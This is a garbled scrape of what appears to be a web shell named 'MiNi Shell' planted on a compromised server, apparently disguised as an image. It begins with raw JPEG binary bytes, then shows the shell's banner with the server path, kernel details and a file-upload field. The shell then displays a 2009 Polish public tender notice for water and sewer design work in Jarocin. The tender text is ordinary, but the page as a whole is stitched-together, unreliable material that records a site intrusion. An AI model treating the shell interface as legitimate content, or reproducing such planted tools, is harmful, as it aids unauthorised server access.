JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/63309-N-2009.html

<p class="kh_header"><b>Jarocin: Wykonanie dokumentacji technicznej dla zadania: przebudowa wodociągu z przyłączami oraz rozdział kanalizacji sanitarnej od deszczowej z przyłączami w Śródmieściu Jarocina</b><br>
<b>Numer ogłoszenia: 63309 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. z siedzibą w Jarocinie , ul. Marcina Kasprzaka 1a, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7473487, 7477318, faks 062 7473480.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwikjarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej dla zadania: przebudowa wodociągu z przyłączami oraz rozdział kanalizacji sanitarnej od deszczowej z przyłączami w Śródmieściu Jarocina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest wykonanie dokumentacji technicznej dla wyko-nania zadania: Wykonanie dokumentacji technicznej dla zadania: przebudowa wodociągu z przyłączami oraz rozdział kanalizacji sanitarnej od deszczowej 
z przyłączami w Śródmieściu Jarocina wraz z prawomocnymi pozwoleniami na budowę dla każdego z 3 etapów (o których mowa poniżej), zgodnie z zasadami sztuki projektowej i współczesnej wiedzy technicznej, a także odpowiednimi normami i obowiązującymi przepisami. 
3.2.	Zakres rzeczowy obejmuje sieci i przyłącza następujących ulicach:
3.2.1.	WODOCIĄG
a)	zlewnia nr 1
- ul. Kościuszki (od ul. Libercourt do ul. Dąbrowskiego)
- ul. Dąbrowskiego (od ul. Moniuszki do końca ul. Nowej i ul. Nowa  dwa odcinki ulicy)
- ul. Dąbrowskiego (od ul. Kościuszki do ul. Wrocławskiej)
- ul. Wrocławska (od ul. Hallera do ul. Dąbrowskiego)
b)	zlewnia nr 2
- ul. Kościuszki
- ul. Św. Ducha (od Rynku do ul. Kościelnej)
- ul. Wąska
- ul. Targowa
- ul. Wodna
- ul. Szpitalna
c)	zlewnia nr 3
- Rynek
- ul. Krótka 
- ul. Wąska (od ul. Wrocławskiej do ul. Śródmiejskiej)
- ul. Mała
- ul. Barwickiego
- ul. Wrocławska (od Rynku do ul. Hallera)
- ul. Paderewskiego (od ul. Kościelnej do ul. Wrocławskiej)
- ul. Śródmiejska (od Rynku do ul. Wojska Polskiego)
- ul. Wolności
- ul. Hallera
3.2.2.	KANALIZACJA SANITARNA
a)	zlewnia nr 1
- ul. Kościuszki (od ul. Libercourt do ul. Dąbrowskiego)
- ul. Dąbrowskiego (od ul. Moniuszki do końca ul. Nowej i ul. Nowa  dwa odcinki ulicy)
- ul. Dąbrowskiego (od ul. Kościuszki do ul. Wrocławskiej)
- ul. Wrocławska (od ul. Hallera do ul. Dąbrowskiego)
- ul. Moniuszki
- ul. Dąbrowskiego
- ul. Kościuszki (od ul. Dąbrowskiego do ul. Węglowej)
- ul. Węglowa
b)	zlewnia nr 2
- ul. Kościuszki
- ul. Św. Ducha (od Rynku do ul. Kościelnej)
- ul. Wąska
- ul. Targowa
- ul. Wodna
- ul. Szpitalna
c)	zlewnia nr 3
- Rynek
- ul. Krótka 
- ul. Wąska (od ul. Wrocławskiej do ul. Śródmiejskiej)
- ul. Mała
- ul. Barwickiego
- ul. Wrocławska (od Rynku do ul. Hallera)
- ul. Paderewskiego (od ul. Kościuszki do ul. Wrocławskiej)
- ul. Śródmiejska (od Rynku do ul. Wojska Polskiego)
- ul. Wolności
- ul. Hallera
3.2.3.	KANALIZACJA DESZCZOWA
a)	zlewnia nr 1
- ul. Wrocławska na odcinku os skrzyżowania z ul. Dąbrowskiego 
do ul. Hallera - budowa nowego kolektora deszczowego
- ul. Dąbrowskiego - od studni zlokalizowanej przy Kauflandzie 
do ul. Nowej (do torów PKP) - budowa nowego kolektora desz-czowego
- ul. Węglowa ( od rzeki Lipinki do skrzyżowania z ul. Kościuszki) - przebudowa istniejącego kolektora deszczowego
- ul. Kościuszki (od skrzyżowania z ul. Węglową do skrzyżowania 
z ul. Dąbrowskiego), (od skrzyżowania z ul. Dąbrowskiego do ul. Libercourt) - budowa nowego kolektora deszczowego
- ul. Nowa (os skrzyżowania z ul. Dąbrowskiego do końca) - budo-wa nowego kolektora
- ul. Moniuszki (od skrzyżowania z ul. Dąbrowskiego do skrzyżo-wania z ul. Libercourt)
b)	zlewnia nr 2
- ul. Wodna - do rz. Lipinki - budowa nowego kolektora
- ul. Szpitalna
- ul. Targowa - budowa nowego kolektora
- ul. Kościelna - budowa nowego kolektora
- ul. Wąska (od ul. Targowej do skrzyżowania z ul. Śródmiejską) - budowa nowego kolektora
- ul. Św. Ducha (od skrzyżowania z ul. Targową do Rynku) - budo-wa nowego kolektora
c)	zlewnia nr 3
- ul. Śródmiejska oraz Rynek - posesje od ul. Św. Ducha oraz od ul. Wąskiej
- ul. Hallera i Wrocławska (od skrzyżowania z ul. Śródmiejską do ulicy Wolności)
- ul. Wolności i ul. Wrocławska (od skrzyżowania ul. Śródmiejska do Rynku - ulicą Wrocławską
- ul. Paderewskiego (od skrzyżowania z ul. Wrocławską do ul. Ko-ściuszki)
- ul. Barwickiego
- ul. Mała 
- ul. Wąska - od skrzyżowania ul. Śródmiejskiej do ulicy Wrocław-skiej
- ul. Krótka z wejściem na Rynek
- w zlewni nr 3 należy zaprojektować zbiornik retencyjny zlokalizo-wany za Parkiem - ul. Śródmiejska. Należy uzgodnić położenie zbiornika z Wydziałem Rozwoju Gminy - Jarocin (projektowana droga łącząca ul. Węglową z ul. Śródmiejską)
3.3.	Do SIWZ załączono mapę z zlewnią nr 1, nr 2, nr 3.
3.4.	Realizacja przedmiotu zamówienia będzie następować 3 etapach:
- Etap 1 obejmuje zlewnię nr 1 - dokumentację wykonać (wraz z prawo-mocnym pozwoleniem na budowę) do 31.12.2009 r. 
- Etap 2 obejmuje zlewnię nr 2 - dokumentację wykonać (wraz z prawo-mocnym pozwoleniem na budowę) do 31.03.2010 r.
- Etap 3 obejmuje zlewnię nr 3 - dokumentację wykonać (wraz z prawo-mocnym pozwoleniem na budowę) do 30.06.2010 r.
3.5.	Dokumentacja techniczna powinna być wykonana w oparciu o warunki tech-niczne wydane przez Zamawiającego (szczegółowe warunki techniczne zostaną określone po złożeniu wniosku przez projektanta), a także składać się z projektu budowlanego, w celu uzyskania pozwolenia na budowę, jak również z projektu wykonawczego.
3.6.	Wykonawca we własnym zakresie winien:
- Wykonać niezbędne podkłady geodezyjne lub uaktualnić istniejące
- Uzyskać warunki techniczne od Zamawiającego
- Sporządzić wykaz właścicieli gruntów wraz z aktualnymi adresami i nu-merami działek, przez które będzie przebiegać sieć oraz uzyskać pisemne zgody ww. właścicieli działek na lokalizację, wejście na teren i wbudowa-nie urządzeń (z wymienieniem jakich)
- Wykonać dokumentację hydrogeologiczną wzdłuż przebiegu sieci
- Uzyskać wszystkie niezbędne uzgodnienia (w tym decyzja na wejście 
w pas drogowy oraz wykonać niezbędne operaty wodno-prawne i uzyskać pozwolenie wodno-prawne)
- Uzyskać decyzję o środowiskowych uwarunkowania zgody na realizację przedsięwzięcia 
- Uzyskać decyzję o ustaleniu lokalizacji inwestycji celu publicznego (wraz ze sporządzeniem raportu o oddziaływaniu na środowisko)
- Uzyskać zatwierdzenie opracowanej dokumentacji przez Zamawiającego, przy czym dokumentacja musi być wykonana w oparciu o zapisy Rozpo-rządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funk-cjonalno - użytkowego (Dz.U. z 2004 r., Nr 202, poz. 2072 ze zm.)
- Uzgodnić dokumentację w Powiatowym Ośrodku Dokumentacji Geode-zyjnej i Kartograficznej w Jarocinie
- Dostarczyć w 6 egz. uzgodnioną dokumentację do Działu Techniczno-Inwestycyjnego Zamawiającego
- Przygotować przedmiary robót oraz kosztorys inwestorski zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestor-skiego, obliczania planowanych kosztów prac projektowych oraz plano-wanych kosztów robót budowlanych określonych w programie funkcjo-nalno-użytkowym (Dz.U. z 2004 r., Nr 130, poz. 1389 ze zm.)
- Przygotować specyfikację techniczną wykonania i odbioru robót budowla-nych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 wrze-śnia 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji pro-jektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004 r., Nr 202, poz. 2072 ze zm.)
- Uzyskać pozwolenia na budowę
- Jeśli przepisy prawa lub interes Zamawiającego wymagają dokonania in-nych czynności, niż te wymienione powyżej, Wykonawca jest zobowiąza-ny do ich wykonania w ramach przedmiotu umowy, bez dodatkowego wy-nagrodzenia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.00.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
5.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
5.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem tech-nicznym i osobami zdolnymi do wykonania zamówienia
5.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
5.4.	Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wyma-gają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.5.	Przedstawią aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolni-czego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdro-wotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwol-nienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
5.6.	Posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie okre-ślonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesię-cy przed upływem terminu składania ofert
5.7.	Posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie okre-ślonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.8.	Wykażą wykonane usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robo-tom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Za roboty odpowiadające rodzajem zamówienia, Zamawiający uznawał będzie wykonanie prac polegających na za-projektowaniu co najmniej:
- 1 km sieci wodociągowych
- 1 km sieci kanalizacji sanitarnej
- 1 km sieci kanalizacji deszczowej
5.9.	Wskażą w ofercie część zamówienia, której wykonanie powierzą podwykonaw-com, przy czym łączna wartość prac wykonywanych przez podwykonawców nie może przekroczyć 30 % wynagrodzenia wykonawcy za cały przedmiot zamó-wienia
5.10.	Dysponują lub będą dysponować wykwalifikowaną kadrą techniczną do projek-towania: w branży sanitarnej (przynajmniej 1 osoba), posiadającą obowiązujące w dniu otwarcia ofert zaświadczenia o wpisie do Okręgowej Izby Inżynierów Budownictwa oraz decyzje o nadaniu uprawnień budowlanych
5.11.	Przedstawią polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie pro-wadzonej działalności, z włączeniem odpowiedzialności za szkody powstałe po wykonaniu pracy lub usługi wynikłe z ich wadliwego wykonania, przy czym suma gwarancyjna nie może być mniejsza niż 100.000,00 zł (słownie: sto tysięcy złotych 00/100)
5.12.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (z postę-powania o udzielenie zamówienia wyklucza się wykonawców, o których mowa w art. 24 ust. 1-2, oraz tych, którzy nie spełniają warunków udziału w postępo-waniu, o których mowa w pkt 5.1.-5.11.).

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
Zamawiający dokona oceny spełniania powyższych warunków na podstawie oświadczeń i dokumentów, o których mowa w ust. 6, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki wyko-nawca spełnia. Nie spełnienie chociażby jednego z warunków skutkować będzie wyklu-czeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg załączonego do specyfikacji wzoru
6.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6.3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz wła-ściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 mie-siące przed upływem terminu składania ofert
6.4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6.5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6.6.	Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością ro-botom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich warto-ści oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzają-cych, że roboty te zostały wykonane należycie. Za roboty odpowiadające rodza-jem zamówienia, Zamawiający uznawał będzie wykonanie prac polegających na zaprojektowaniu co najmniej:
- 1 km sieci wodociągowych
- 1 km sieci kanalizacji sanitarnej
- 1 km sieci kanalizacji deszczowej
6.7.	Wykaz części zamówienia, której wykonanie zostanie powierzone podwyko-nawcom, przy czym łączna wartość prac wykonywanych przez podwykonawców nie może przekroczyć 30 % wynagrodzenia wykonawcy za cały przedmiot zamówienia
6.8.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które bę-dą uczestniczyć w wykonywaniu zamówienia, wg załączonego do specyfikacji wzoru
6.9.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6.8., Wyko-nawca wskazał osoby, którymi będzie dysponował
6.10.	Decyzja o nadaniu uprawnień budowlanych dla wszystkich osób wymienionych w wykazie, o którym mowa w pkt 6.8.
6.11.	Obowiązujące w dniu otwarcia ofert zaświadczenie o wpisie do Okręgowej Izby Inżynierów Budownictwa dla wszystkich osób wymienionych w wykazie, o którym mowa w pkt 6.8.
6.12.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej dzia-łalności, z włączeniem odpowiedzialności za szkody powstałe po wykonaniu pracy lub usługi wynikłe z ich wadliwego wykonania, przy czym suma gwaran-cyjna nie może być mniejsza niż 100.000,00 zł (słownie: sto tysięcy złotych 00/100)
6.13.	Pełnomocnictwo wskazujące pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia, z zastrzeżeniem, że pełnomocnictwo to musi być podpisane przez wszystkich zainteresowanych wykonawców - w przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia jako najkorzystniejszej, Zamawiający będzie żądał przed zawarciem umowy 
w sprawie zamówienia publicznego, umowy regulującej współpracę tych pod-miotów
6.14.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rze-czypospolitej Polskiej 
6.14.1.	zamiast dokumentów, o których mowa w pkt 5.4., 5.5., 5.7. pkt Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
6.14.1.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości
6.14.1.2.	nie zalega z uiszczaniem podatków, opłat, składek na ubez-pieczenie społeczne i zdrowotne albo że uzyskał przewi-dziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
6.14.1.3.	nie orzeczono wobec niego zakazu ubiegania się o zamó-wienie
6.14.2.	zamiast dokumentów, o których mowa w pkt 5.6. pkt Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny speł-niania tych warunków - składa zaświadczenie właściwego organu są-dowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie  określonym w art. 24 ust. 1 pkt 4-8 ustawy
6.14.3.	Dokumenty, o których mowa w pkt 6.14.1.1., 6.14.1.3. i 6.14.2. niniej-szej specyfikacji, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w 6.14.1.2., powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez wykonawcę.
6.14.4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, 
o których mowa w 6.14.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądo-wym, administracyjnym albo organem samorządu zawodowego lub go-spodarczego odpowiednio kraju pochodzenia osoby lub kraju, w któ-rym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt 6.14.3. stosuje się odpowiednio.
6.15.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
6.15.1.	Do oferty należy załączyć pełnomocnictwo wskazujące pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
z zastrzeżeniem, że pełnomocnictwo to musi być podpisane przez wszystkich zainteresowanych wykonawców - jeśli dotyczy (w przy-padku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia jako najkorzystniejszej, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych podmiotów).
6.15.2.	Zamawiający wymagać będzie oddzielnie od każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumentów, 
o których mowa w punktach: 6.1., 6.2., 6.3., 6.4., 6.5., 6.12. pkt Wy-kaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu - nie podlegają one sumowaniu.
6.15.3.	Załączenie dokumentów, o których mowa powyżej, ma udowodnić, że żaden z uczestników nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
6.15.4.	Jeśli przynajmniej jeden z uczestników nie przedstawi dokumentów al-bo z innego powodu podlega wykluczeniu, wykluczeni zostaną wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
6.15.5.	Oświadczenia i dokumenty niewymienione w pkt 6.15.2. niniejszej spe-cyfikacji wykonawcy składają wspólnie i podlegają one sumowaniu.
6.15.6.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie. 
6.15.7.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (li-dera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. 
6.15.8.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem). 
6.15.9.	Wypełniając formularz ofertowy, jak również inne dokumenty powołu-jące się na wykonawcę, w miejscu np.: nazwa i adres wykonawcy nale-ży wpisać dane dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie tylko pełnomocnika; rozumie się przez to nazwę i adres pełnomocnika (lidera) oraz nazwę i adres partnerów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pwikjarocin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jest zamieszczona na stronie internetowej: www.pwikjarocin.pl. SIWZ w wersji papierowej płatna: 50,00 zł netto (sposób płatności: przelew).</p>
